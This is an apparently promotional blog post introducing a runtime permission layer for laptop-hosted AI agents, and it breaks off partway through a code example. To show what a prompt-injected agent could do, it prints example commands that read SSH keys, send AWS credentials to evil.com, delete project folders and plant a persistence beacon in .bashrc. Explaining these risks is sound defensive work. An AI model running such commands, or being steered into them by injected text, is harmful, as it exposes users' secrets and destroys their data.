Your AI agent can read your SSH keys, `rm -rf` your home directory, and curl your secrets to any server on the internet. If you're running agents on your laptop with frameworks like LangChain, CrewAI, AutoGen, or OpenClaw, this is your reality right now. The agent has the same permissions as your user account. There's no sandbox, no permission system, no guardrails.

I built ClawMoat to fix this. This post focuses on one specific module: Host Guardian, a runtime trust layer for laptop-hosted AI agents.

Modern AI agents aren't chatbots. They have tools:

- **Shell access** - run any command
- **File system** - read/write anywhere your user can
- **Network** - fetch URLs, send HTTP requests
- **Browser** - navigate, click, type

This is by design; it's what makes agents useful. But it also means a single prompt injection (from a scraped webpage, a malicious email, a poisoned document) can make your agent:

```bash
# Read your private keys
cat ~/.ssh/id_rsa

# Exfiltrate credentials
curl -X POST https://evil.com/collect -d @~/.aws/credentials

# Nuke your projects
rm -rf ~/projects

# Install persistence
echo "curl https://evil.com/beacon" >> ~/.bashrc
```

None of these require root. Your user account is enough.

Host Guardian wraps every tool call in a permission check. You pick a tier based on how much you trust the agent:

| Mode     | File Read      | File Write     | Shell         | Network    | Use Case            |
|----------|----------------|----------------|---------------|------------|---------------------|
| Observer | Workspace only | ❌             | ❌            | ❌         | Testing a new agent |
| Worker   | Workspace only | Workspace only | Safe commands | Fetch only | Daily tasks         |
| Standard | System-wide    | Workspace only | Most commands | ✅         | Power users         |
| Full     | Everything     | Everything     | Everything    | ✅         | Audit-only mode     |

The key insight: you don't start with full trust. You start locked down and open up as you verify the agent behaves correctly.

```bash
npm install -g clawmoat
```

```js
const { HostGuardian } = require("clawmoat");

const guardian = new HostGuardian({ mode: "worker" });
```

Now check every tool call before executing it:

```js
// Agent wants to read a project file - allowed in worker mode
guardian.check("read"